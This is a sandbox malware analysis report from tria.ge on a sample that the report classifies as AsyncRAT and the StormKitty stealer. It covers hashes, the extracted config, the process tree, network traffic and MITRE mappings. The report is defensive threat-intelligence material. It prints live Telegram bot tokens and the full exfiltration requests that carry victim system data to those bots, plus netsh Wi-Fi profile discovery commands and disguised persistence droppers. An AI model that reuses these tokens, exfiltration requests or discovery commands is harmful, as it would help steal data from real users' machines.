Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

2025-01-25...id.exe

windows7-x64

10

2025-01-25...id.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/01/2025, 00:46 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2025-01-25_6ad6bb9ff2600d6e03aeea4d5aaae235_icedid.exe

  • Size

    2.0MB

  • MD5

    6ad6bb9ff2600d6e03aeea4d5aaae235

  • SHA1

    e5c72c1a2a35e01b1e9d64cf7991d86abc88cce5

  • SHA256

    047b76675a633db72c428f5c79a6b5ca5c7b3a6fbebbb7de5ec495e4cb1857af

  • SHA512

    d3da5954fb81e8d4f50fc16ff89c5627de0c3e7e2e393b3dbd4d27293ba3e1b388e92a0585a5dd9df6a10561fcd519f014b90a5257d7c2c606de21fc001db770

  • SSDEEP

    24576:SGyEQkGMex01TGQ0U7dr0hYmwFRbKOdzzmh3xtJ5GfsZOu17s:SGrdomllYOpcxckfs

Score
10/10
asyncratstormkittydefaultdiscoverypersistenceprivilege_escalationratspywarestealer

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot6110313252:AAE6fFOzBefHnbenT-1DwxI9EBeZQTxbYGk/sendMessage?chat_id=6291749148
Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain
1
VIfxfqryUTyZUBGDCBAvbYVYIsexIM7Z

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Stormkitty family
    stormkitty
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 7 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Drops desktop.ini file(s) 8 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of SetThreadContext 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Suspicious behavior: EnumeratesProcesses 25 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-01-25_6ad6bb9ff2600d6e03aeea4d5aaae235_icedid.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-01-25_6ad6bb9ff2600d6e03aeea4d5aaae235_icedid.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4468
    • C:\Users\Admin\AppData\Roaming\Aws SMTPS Cracker Private.exe
      "C:\Users\Admin\AppData\Roaming\Aws SMTPS Cracker Private.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2848
      • C:\Users\Admin\AppData\Roaming\Windows Defender Security.exe
        "C:\Users\Admin\AppData\Roaming\Windows Defender Security.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:232
        • C:\Users\Admin\AppData\Roaming\Windows Defender Security.exe
          "C:\Users\Admin\AppData\Roaming\Windows Defender Security.exe"
          4⤵
          • Executes dropped EXE
          • Drops desktop.ini file(s)
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2812
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:460
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1972
            • C:\Windows\SysWOW64\netsh.exe
              netsh wlan show profile
              6⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:2704
            • C:\Windows\SysWOW64\findstr.exe
              findstr All
              6⤵
              • System Location Discovery: System Language Discovery
              PID:4348
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1632
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2156
            • C:\Windows\SysWOW64\netsh.exe
              netsh wlan show networks mode=bssid
              6⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:4000
      • C:\Users\Admin\AppData\Roaming\Windows Security.exe
        "C:\Users\Admin\AppData\Roaming\Windows Security.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1264
        • C:\Users\Admin\AppData\Roaming\Windows Security.exe
          "C:\Users\Admin\AppData\Roaming\Windows Security.exe"
          4⤵
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:4704
      • C:\Users\Admin\AppData\Roaming\crack.exe
        "C:\Users\Admin\AppData\Roaming\crack.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1436
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp81B3.tmp.cmd""
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4872
          • C:\Windows\SysWOW64\timeout.exe
            timeout 4
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:2204
    • C:\Users\Admin\AppData\Roaming\HeartSender.exe
      "C:\Users\Admin\AppData\Roaming\HeartSender.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:772

Network

  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    106.27.33.23.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    106.27.33.23.in-addr.arpa
    IN PTR
    Response
    106.27.33.23.in-addr.arpa
    IN PTR
    a23-33-27-106deploystaticakamaitechnologiescom
  • flag-us
    DNS
    api.telegram.org
    Windows Defender Security.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • flag-nl
    GET
    https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDP
    crack.exe
    Remote address:
    149.154.167.220:443
    Request
    GET /bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDP HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Sat, 25 Jan 2025 00:46:23 GMT
    Content-Type: application/json
    Content-Length: 250
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-us
    DNS
    17.160.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    17.160.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    167.173.78.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    167.173.78.104.in-addr.arpa
    IN PTR
    Response
    167.173.78.104.in-addr.arpa
    IN PTR
    a104-78-173-167deploystaticakamaitechnologiescom
  • flag-us
    DNS
    220.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    220.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    104.219.191.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    104.219.191.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    icanhazip.com
    Windows Defender Security.exe
    Remote address:
    8.8.8.8:53
    Request
    icanhazip.com
    IN A
    Response
    icanhazip.com
    IN A
    104.16.185.241
    icanhazip.com
    IN A
    104.16.184.241
  • flag-us
    GET
    http://icanhazip.com/
    Windows Defender Security.exe
    Remote address:
    104.16.185.241:80
    Request
    GET / HTTP/1.1
    Host: icanhazip.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sat, 25 Jan 2025 00:46:36 GMT
    Content-Type: text/plain
    Content-Length: 15
    Connection: keep-alive
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET
    Set-Cookie: __cf_bm=xcTo2JlupiCEauqBZ9xTtN0Wbv0ulV9wg57j_U3h_y4-1737765996-1.0.1.1-h69Na0z2fZgDOG02kzmPp8XOCV60KyK3krb8iu6PKf2z5Yb2zQ1WLv1e4MknCzbLGDcKtjSHFQIhGg2xsPtcDg; path=/; expires=Sat, 25-Jan-25 01:16:36 GMT; domain=.icanhazip.com; HttpOnly
    Server: cloudflare
    CF-RAY: 90743f478dc0ed06-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    api.mylnikov.org
    Windows Defender Security.exe
    Remote address:
    8.8.8.8:53
    Request
    api.mylnikov.org
    IN A
    Response
    api.mylnikov.org
    IN A
    104.21.44.66
    api.mylnikov.org
    IN A
    172.67.196.114
  • flag-us
    GET
    https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=56:58:e1:33:14:43
    Windows Defender Security.exe
    Remote address:
    104.21.44.66:443
    Request
    GET /geolocation/wifi?v=1.1&bssid=56:58:e1:33:14:43 HTTP/1.1
    Host: api.mylnikov.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Sat, 25 Jan 2025 00:46:37 GMT
    Content-Type: application/json; charset=utf8
    Content-Length: 88
    Connection: keep-alive
    Access-Control-Allow-Origin: *
    Cache-Control: max-age=2678400
    CF-Cache-Status: MISS
    Last-Modified: Sat, 25 Jan 2025 00:46:37 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XDjsfFSRD1vM4oPO94N6ADZePYOvMOO%2FP2hKOtpeT65DERqiNYFa8x0jF1KZ7grIChwF1njkRgObU0OEuqUs6mClfx0XT0pkBiB8ogHQLt98aNoh1c0fvjp85EeD6oKy8nLm"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Strict-Transport-Security: max-age=0; preload
    X-Content-Type-Options: nosniff
    Server: cloudflare
    CF-RAY: 90743f48fc7a93e6-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=28734&min_rtt=26797&rtt_var=8991&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2989&recv_bytes=412&delivery_rate=126220&cwnd=253&unsent_bytes=0&cid=0982215e036b3da8&ts=319&x=0"
  • flag-us
    DNS
    241.185.16.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.185.16.104.in-addr.arpa
    IN PTR
    Response
  • flag-nl
    GET
    https://api.telegram.org/bot6110313252:AAE6fFOzBefHnbenT-1DwxI9EBeZQTxbYGk/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202025-01-25%2012:46:23%20AM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20OFGADUSE%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.0.240%0AExternal%20IP:%20181.215.176.83%0ABSSID:%2056:58:e1:33:14:43%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True
    Windows Defender Security.exe
    Remote address:
    149.154.167.220:443
    Request
    GET /bot6110313252:AAE6fFOzBefHnbenT-1DwxI9EBeZQTxbYGk/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202025-01-25%2012:46:23%20AM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20OFGADUSE%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.0.240%0AExternal%20IP:%20181.215.176.83%0ABSSID:%2056:58:e1:33:14:43%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Sat, 25 Jan 2025 00:46:38 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-nl
    GET
    https://api.telegram.org/bot6110313252:AAE6fFOzBefHnbenT-1DwxI9EBeZQTxbYGk/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders...
    Windows Defender Security.exe
    Remote address:
    149.154.167.220:443
    Request
    GET /bot6110313252:AAE6fFOzBefHnbenT-1DwxI9EBeZQTxbYGk/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
    Host: api.telegram.org
    Response
    HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Sat, 25 Jan 2025 00:46:39 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-us
    DNS
    66.44.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    66.44.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    200.163.202.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.163.202.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    241.42.69.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.42.69.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    21.49.80.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    21.49.80.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    85.49.80.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    85.49.80.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    43.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.229.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    43.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.229.111.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    74.239.69.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    74.239.69.13.in-addr.arpa
    IN PTR
    Response
  • 149.154.167.220:443
    https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDP
    tls, http
    crack.exe
    866 B
     6.9kB
     9
    11

    HTTP Request

    GET https://api.telegram.org/bot5904946097:AAEb_US4tHY3ko2z9Y7a20zEv4AtQqZipKM/sendMessage?chat_id=5881759996&text=This+Not+RDP

    HTTP Response

    200
  • 127.0.0.1:3389
    crack.exe
  • 104.16.185.241:80
    http://icanhazip.com/
    http
    Windows Defender Security.exe
    339 B
     709 B
     6
    4

    HTTP Request

    GET http://icanhazip.com/

    HTTP Response

    200
  • 104.21.44.66:443
    https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=56:58:e1:33:14:43
    tls, http
    Windows Defender Security.exe
    814 B
     4.5kB
     9
    9

    HTTP Request

    GET https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=56:58:e1:33:14:43

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot6110313252:AAE6fFOzBefHnbenT-1DwxI9EBeZQTxbYGk/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders...
    tls, http
    Windows Defender Security.exe
    2.6kB
     7.2kB
     13
    13

    HTTP Request

    GET https://api.telegram.org/bot6110313252:AAE6fFOzBefHnbenT-1DwxI9EBeZQTxbYGk/sendMessage?chat_id=6291749148&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202025-01-25%2012:46:23%20AM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20OFGADUSE%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.0.240%0AExternal%20IP:%20181.215.176.83%0ABSSID:%2056:58:e1:33:14:43%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True

    HTTP Response

    401

    HTTP Request

    GET https://api.telegram.org/bot6110313252:AAE6fFOzBefHnbenT-1DwxI9EBeZQTxbYGk/sendMessage?chat_id=6291749148&text=%F0%9F%93%81%20Uploading%20Log%20Folders...

    HTTP Response

    401
  • 127.0.0.1:7707
    Windows Defender Security.exe
  • 127.0.0.1:6606
    Windows Defender Security.exe
  • 127.0.0.1:6606
    Windows Defender Security.exe
  • 127.0.0.1:8808
    Windows Defender Security.exe
  • 127.0.0.1:6606
    Windows Defender Security.exe
  • 127.0.0.1:7707
    Windows Defender Security.exe
  • 127.0.0.1:6606
    Windows Defender Security.exe
  • 127.0.0.1:8808
    Windows Defender Security.exe
  • 127.0.0.1:6606
    Windows Defender Security.exe
  • 127.0.0.1:8808
    Windows Defender Security.exe
  • 127.0.0.1:7707
    Windows Defender Security.exe
  • 127.0.0.1:8808
    Windows Defender Security.exe
  • 127.0.0.1:8808
    Windows Defender Security.exe
  • 127.0.0.1:8808
    Windows Defender Security.exe
  • 127.0.0.1:8808
    Windows Defender Security.exe
  • 127.0.0.1:7707
    Windows Defender Security.exe
  • 127.0.0.1:8808
    Windows Defender Security.exe
  • 127.0.0.1:7707
    Windows Defender Security.exe
  • 127.0.0.1:8808
    Windows Defender Security.exe
  • 8.8.8.8:53
    28.118.140.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    28.118.140.52.in-addr.arpa

  • 8.8.8.8:53
    106.27.33.23.in-addr.arpa
    dns
    71 B
     135 B
     1
    1

    DNS Request

    106.27.33.23.in-addr.arpa

  • 8.8.8.8:53
    api.telegram.org
    dns
    Windows Defender Security.exe
    62 B
     78 B
     1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

  • 8.8.8.8:53
    17.160.190.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    17.160.190.20.in-addr.arpa

  • 8.8.8.8:53
    167.173.78.104.in-addr.arpa
    dns
    73 B
     139 B
     1
    1

    DNS Request

    167.173.78.104.in-addr.arpa

  • 8.8.8.8:53
    220.167.154.149.in-addr.arpa
    dns
    74 B
     167 B
     1
    1

    DNS Request

    220.167.154.149.in-addr.arpa

  • 8.8.8.8:53
    104.219.191.52.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    104.219.191.52.in-addr.arpa

  • 8.8.8.8:53
    icanhazip.com
    dns
    Windows Defender Security.exe
    59 B
     91 B
     1
    1

    DNS Request

    icanhazip.com

    DNS Response

    104.16.185.241
    104.16.184.241

  • 8.8.8.8:53
    api.mylnikov.org
    dns
    Windows Defender Security.exe
    62 B
     94 B
     1
    1

    DNS Request

    api.mylnikov.org

    DNS Response

    104.21.44.66
    172.67.196.114

  • 8.8.8.8:53
    241.185.16.104.in-addr.arpa
    dns
    73 B
     135 B
     1
    1

    DNS Request

    241.185.16.104.in-addr.arpa

  • 8.8.8.8:53
    66.44.21.104.in-addr.arpa
    dns
    71 B
     133 B
     1
    1

    DNS Request

    66.44.21.104.in-addr.arpa

  • 8.8.8.8:53
    200.163.202.172.in-addr.arpa
    dns
    74 B
     160 B
     1
    1

    DNS Request

    200.163.202.172.in-addr.arpa

  • 8.8.8.8:53
    241.42.69.40.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    241.42.69.40.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
     128 B
     1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    21.49.80.91.in-addr.arpa
    dns
    70 B
     145 B
     1
    1

    DNS Request

    21.49.80.91.in-addr.arpa

  • 8.8.8.8:53
    85.49.80.91.in-addr.arpa
    dns
    70 B
     145 B
     1
    1

    DNS Request

    85.49.80.91.in-addr.arpa

  • 8.8.8.8:53
    43.229.111.52.in-addr.arpa
    dns
    144 B
     158 B
     2
    1

    DNS Request

    43.229.111.52.in-addr.arpa

    DNS Request

    43.229.111.52.in-addr.arpa

  • 8.8.8.8:53
    74.239.69.13.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    74.239.69.13.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Event Triggered Execution

1
T1546

Netsh Helper DLL

1
T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Event Triggered Execution

1
T1546

Netsh Helper DLL

1
T1546.007

Defense Evasion

Modify Registry

1
T1112

Credential Access

Credentials from Password Stores

1
T1555

Credentials from Web Browsers

1
T1555.003

Unsecured Credentials

1
T1552

Credentials In Files

1
T1552.001

Discovery

Browser Information Discovery

1
T1217

Query Registry

2
T1012

System Information Discovery

3
T1082

System Location Discovery

1
T1614

System Language Discovery

1
T1614.001

System Network Configuration Discovery

1
T1016

Wi-Fi Discovery

1
T1016.002

Lateral Movement

Collection

Data from Local System

1
T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\0bc93425a1886bc80ecfe1f12a8c70bd\Admin@OFGADUSE_en-US\System\Process.txt
    Filesize

    4KB

    MD5

    19bfb3ef58c362da8e82663e5739ed26

    SHA1

    e3da88e39ab9776c70d4127c66fc9c1318861c0d

    SHA256

    8834cec7916793f4466b658ec217baa357b88f2c647951ef846c13cb916b0fa6

    SHA512

    89a67baa9e660b2cc7302162e3e796172c992c6a590731dc4477b9bcbdaf74c0cf6b11f4473d9e7ec5880a86b8a0ef334a05dd8813c20c924785cd9ca9c6c542

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Windows Defender Security.exe.log
    Filesize

    507B

    MD5

    76ffb2f33cb32ade8fc862a67599e9d8

    SHA1

    920cc4ab75b36d2f9f6e979b74db568973c49130

    SHA256

    f1a3724670e3379318ec9c73f6f39058cab0ab013ba3cd90c047c3d701362310

    SHA512

    f33502c2e1bb30c05359bfc6819ca934642a1e01874e3060349127d792694d56ad22fccd6c9477b8ee50d66db35785779324273f509576b48b7f85577e001b4e

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\tmp81B3.tmp.cmd
    Filesize

    151B

    MD5

    bccf948888cc446951f479d0240fb840

    SHA1

